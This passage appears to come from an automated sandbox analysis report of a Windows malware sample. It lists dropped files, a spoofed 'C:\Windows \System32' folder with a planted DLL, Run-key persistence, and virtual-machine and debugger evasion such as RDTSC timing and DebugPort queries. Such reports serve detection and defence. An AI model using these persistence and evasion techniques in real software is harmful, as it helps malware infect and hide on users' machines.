        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00415614 push ss; retf
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_0040CFD2 push ss; retf
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_0040EF94 pushad ; iretd
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AED0D1 push ecx; ret
        Source: C:\Windows \System32\Netplwiz.exeCode function: 8_2_613CF021 pushfq ; iretd
        Source: C:\Windows \System32\Netplwiz.exeCode function: 8_2_613CFD00 pushfq ; ret
        Source: C:\Windows \System32\Netplwiz.exeCode function: 8_2_613D0DFE push rsp; iretd
        Source: C:\Users\Public\Citvon\Citvon.exeCode function: 17_3_022D53E8 push eax; ret
        Source: C:\Users\Public\Citvon\Citvon.exeCode function: 17_3_022DA934 push eax; ret
        Source: C:\Users\Public\Citvon\Citvon.exeCode function: 17_3_022D7F44 push 00405B69h; ret
        Source: C:\Users\Public\Citvon\Citvon.exeCode function: 20_3_02208222 push 00405E24h; ret
        Source: C:\Users\Public\Citvon\Citvon.exeCode function: 20_3_02208222 push 00405E24h; ret
        Source: C:\Users\Public\Citvon\Citvon.exeCode function: 20_3_02208224 push 00405E24h; ret

        Persistence and Installation Behavior:

        barindex
        Drops executables to the windows directory (C:\Windows) and starts themShow sources
        Source: C:\Windows\SysWOW64\cmd.exeExecutable created and started: C:\Windows \System32\Netplwiz.exe
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeFile created: C:\Users\Public\Netplwiz.exeJump to dropped file
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeFile created: C:\Users\Public\Citvon\Citvon.exeJump to dropped file
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows \System32\Netplwiz.exeJump to dropped file
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows \System32\NETUTILS.dllJump to dropped file
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeFile created: C:\Users\Public\NETUTILS.dllJump to dropped file
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeFile created: C:\Users\Public\Netplwiz.exeJump to dropped file
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeFile created: C:\Users\Public\NETUTILS.dllJump to dropped file
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows \System32\Netplwiz.exeJump to dropped file
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows \System32\NETUTILS.dllJump to dropped file

        Boot Survival:

        barindex
        Drops PE files to the user root directoryShow sources
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeFile created: C:\Users\Public\Netplwiz.exeJump to dropped file
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeFile created: C:\Users\Public\NETUTILS.dllJump to dropped file
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run CitvonJump to behavior
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run CitvonJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Citvon\Citvon.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Citvon\Citvon.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        barindex
        Tries to detect virtualization through RDTSC time measurementsShow sources
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\Public\Citvon\Citvon.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\Public\Citvon\Citvon.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 0000000000E585E4 second address: 0000000000E585EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 0000000000E5896E second address: 0000000000E58974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\msiexec.exeRDTSC instruction interceptor: First address: 00000000003185E4 second address: 00000000003185EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\msiexec.exeRDTSC instruction interceptor: First address: 000000000031896E second address: 0000000000318974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_004088A0 rdtsc
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4961
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3420
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6864Thread sleep time: -4611686018427385s >= -30000s
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\WWAHost.exeLast function: Thread delayed
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: powershell.exe, 0000000D.00000002.753688742.00000172C28B0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
        Source: powershell.exe, 0000000D.00000003.705849674.00000172A814A000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}k
        Source: powershell.exe, 0000000D.00000002.753688742.00000172C28B0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
        Source: powershell.exe, 0000000D.00000002.753688742.00000172C28B0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
        Source: powershell.exe, 0000000D.00000002.753688742.00000172C28B0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeProcess information queried: ProcessInformation
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeProcess queried: DebugPort
        Source: C:\Users\Public\Citvon\Citvon.exeProcess queried: DebugPort
        Source: C:\Users\Public\Citvon\Citvon.exeProcess queried: DebugPort
        Source: C:\Windows\SysWOW64\WWAHost.exeProcess queried: DebugPort
        Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPort
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_004088A0 rdtsc
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD9860 NtQuerySystemInformation,LdrInitializeThunk,
        Source: C:\Windows \System32\Netplwiz.exeCode function: 8_2_00007FF61AD317F0 GetCurrentThreadId,memset,IsDebuggerPresent,OutputDebugStringW,
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD90AF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AA28AE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AA28AE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AA28AE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AA28AE mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AA28AE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AA28AE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC20A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC20A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC20A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC20A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC20A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC20A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACF0BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACF0BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACF0BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A99080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A93880 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A93880 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B13884 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B13884 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A958EC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A940E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A940E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A940E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABB8E4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABB8E4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AA28FD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AA28FD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AA28FD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B2B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B2B8D0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B2B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B2B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B2B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B2B8D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B518CA mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AAB02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AAB02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AAB02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AAB02A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC002D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC4020 mov edi, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA830 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA830 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA830 mov eax, dword ptr fs:[00000030h]
